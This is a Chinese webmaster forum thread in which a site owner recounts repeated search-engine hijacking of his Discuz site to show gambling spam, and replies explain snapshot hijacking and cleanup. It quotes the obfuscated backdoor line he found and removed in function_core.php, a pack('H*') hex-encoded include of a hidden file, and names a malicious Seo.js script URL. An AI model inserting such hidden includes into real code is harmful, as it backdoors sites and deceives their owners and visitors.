牛逼的搜索引擎劫持，function_core.php文件

1、DNS劫持：
    14年1月份，发现网站中了博彩，然后各种检测，包括360，包括安全联盟，在3天内，各大搜索引擎均被拦截，赶紧补漏洞找木马文件，最后确定为DNS劫持，最后经过不懈努力，找到了文件进行删除，然后补漏洞然后安全联盟申请解封，具体原因有可能是黑客扫描攻击外，查到可能品牌商家或者某个插件有漏洞。
2、连续3次搜索引擎劫持

  以前的DOS攻击就不说了，DNS劫持也不说了，这都是大家知道的也了解的，但是3月份又被各大搜索引擎拦截，还是各种查，无果，因为没查出木马文件，访问都正常，页面都正常，就一点只要是搜索引擎都是博彩，感觉可能上次没处理完，留下的后门，但是还是没找到原因，在安全联盟查，技术员说是我中了http://api.discuz.com.de/Seo.js病毒，打开可以看到，只要是搜索引擎都被拦截，咨询很多站长和技术，均表示无果，在对服务器全盘扫描，然后再对文件进行校验，发现是function_core.php文件里面有加密的代码进行了调用，
370行：
INCLUDE(pack('H*','633a5c77696e646f77735c74656d705c2e53595344554d505c2e576830416d492e434f5245'));删除这段代码然后蜘蛛正常，

到这里以为没事了，一个月后又博彩，结果还是这个文件被修改，采用同样办法。再次扫描还是没找到根源。

3、第三次中毒

    修改function_core.php文件，因为前两次经验，只要再中，就先找这个文件，但是我一般先看修改文件的日期，结果这个文件在一周内没有被修改，就忽略了，找很多地方没找到原因，再次对比这个文件发现 还是function_core.php加了加密代码1012行。删除后表示正常。

1、我主要做内容，技术一般，很多东西都是慢慢在学，上面的表达也许有些地方不准确，大家不要笑话。
2、这个搜索劫持很烦人，关键是我的站已经没有了排名和收录
3、关于蜘蛛模拟，以为我都是用站长网或者第三方，发现都不准确存在缓存，后来专门用百度站长工具，只有这一个才是实时模拟的，其余的都不准，http://zhanzhang.baidu.com
4、至于我连续中这样的劫持，说明我还没找到根源，所以求助大家帮我找到根源，怎么修改的我的这个文件，是怎么样进行加密和调用的，帮我找到根源才可以，不然肯定还有第四次。
5、如果大家中了这个，简单说一下我的流程，先在百度站长模拟蜘蛛爬行：，然后后台文件校验，看近期修改的那个文件，然后一个个逐级排查，接着处理木马文件，然后进行备份和补漏洞，然后到安全联盟进行解封。


现在做个站太难了，我是在省级门户做内容管理，这个www.xinmiba.com 是自己弄着玩呢，去年天天被攻击，今年天天中木马，一点不赚钱还贴我大量精力时间，当然也让我从中学了很多东西。做一个DZ站，宣传部门要管、网监要管、工信部、通讯管理局、文化厅都要管，上月我的网站转了2个优酷的视频，又冒出来个文广新局把我的站封了，我写了个保证书才开。。。。。。一句话：当个站长太难了

一句话：当个站长太难

技术上不懂，但看遭遇绝对要支持你，我的站目前只在内网，被你这么一说，都不敢挂外网了

亲们，求解决根源啊，不然过不了几天我肯定还被劫持

环境不安全 被挂马 哦~ 这个是劫持快照的

crx349 发表于 2014-5-9 17:31
环境不安全 被挂马 哦~ 这个是劫持快照的

的确是劫持快照的，各大搜索都劫持，关键是我找到这个文件，但是不是根源，我找不到根源

窃持什么的太可恶了

百度快照的劫持原理

首先我们要认识清楚百度快照劫持的原理，黑客不是直接进入百度快照数据库进行修改，百度快照数据库的安全性，估计一般的黑客是很难侵入的。黑客也不是网络欺骗（点击一个网站快照网络被欺骗访问到了另一个网站快照），这种网络欺骗黑客也是很难攻击的，至少成本非常大，不至于攻击你的网站。最后一种，就是黑客直接侵入一个网站，修改网站的代码，修改成黑客设置的代码，当搜索引擎快照更新时，就更新成黑客的快照了。百度快照劫持也是通过这种方法实现的。要想百度快照劫持一个网站，首先必须先侵入该网站，获得该网站的控制权，如何修改该网站的代码，百度蜘蛛抓取，更新快照，百度快照就变成其他的快照了。

预防百度快照劫持的方法

通过百度快照劫持的原理我们知道，百度快照要被劫持，首先必须入侵该网站，如果网站安全做的好，黑客无法入侵，自热而然就不会百度快照劫持了。因此要做好网站的安全性工作，检查网站程序是否有漏洞，发现漏洞及时修复，程序后台，ftp密码是否足够复杂，服务器是否经常修复，服务器安全性是否有保证。因此一般做好三个方面，程序避免有漏洞，防止黑人注入，程序后台，ftp密码足够复杂防止强力破解，服务器足够安全，防止利用漏洞被入侵，如果做好以上三个方面，基本可以确保网站的安全。

发生百度快照劫持的处理方法

当网站被百度快照劫持了，如果处理呢？

1、删除黑客程序代码，确保程序代码正常。

2、百度快照投诉，网站代码确保正常以后，进行百度快照投诉，尽快恢复正常快照。

3、漏洞修复，避免下次再次被劫持。

劫持快照的 我也看了  
这三次都是修改的这个文件，includ的加密代码
我现在关键是找不到根源，不能中毒我就删除代码，我要找到怎么中的，现在找不到愁人